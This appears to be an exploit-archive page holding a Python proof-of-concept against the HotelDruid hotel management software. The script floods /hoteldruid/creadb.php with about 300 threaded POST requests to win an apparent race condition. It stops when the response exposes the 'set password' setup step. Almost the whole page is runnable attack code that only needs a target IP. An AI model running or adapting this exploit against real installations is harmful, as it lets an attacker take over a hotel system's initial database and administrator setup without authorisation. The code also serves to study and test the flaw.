4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / exploit.py PY
import sys
import requests
import threading
import time

threads = []
stop_event = threading.Event()
count = 0

def send_post_request(ip, index):
	url = f"http://{ip}/hoteldruid/creadb.php"
	headers = {
		"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0",
		"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
		"Accept-Language": "en-US",
		"Accept-Encoding": "gzip, deflate, br",
		"Content-Type": "application/x-www-form-urlencoded",
		"Origin": f"http://{ip}",
		"Connection": "keep-alive",
		"Referer": f"http://{ip}/hoteldruid/inizio.php",
		"Upgrade-Insecure-Requests": "1",
	}
	data = {"lingua": "en"}

	global count
	count += 1
	print(f"Req {index}")

	def request_thread():
		if stop_event.is_set():
			return

		try:
			response = requests.post(url, headers=headers, data=data)
			if response.status_code == 200:
				print(f"Req {index} ok")
			else:
				print(f"Req {index} failed ({response.status_code})")

			if "set password" in response.text.lower():
				print(f"\033[92m !Got info with Req {index}!\033[0m")
				print(response.text)
				print("\033[92m !WIN! Press CTRL+C to exit!\033[0m")
				stop_event.set()
				sys.exit(0)

		except requests.exceptions.RequestException as e:
			print(f"Req {index} failed: {e}")

	thread = threading.Thread(target=request_thread)
	thread.start()
	threads.append(thread)

if __name__ == "__main__":
	if len(sys.argv) != 2:
		print("Usage: python3 exploit.py IP_ADDRESS")
		sys.exit(1)

	ip_address = sys.argv[1]
	total_requests = 300 #If the exploit doesn't work, you can try and increase this number. By doing so, you will send more requests. However, '300' appears to work most times

	for i in range(1, total_requests + 1):
		time.sleep(0.02)
		send_post_request(ip_address, i)

	print(f"Waiting for them to complete...")
	for thread in threads:
		thread.join()

	print("All requests completed.")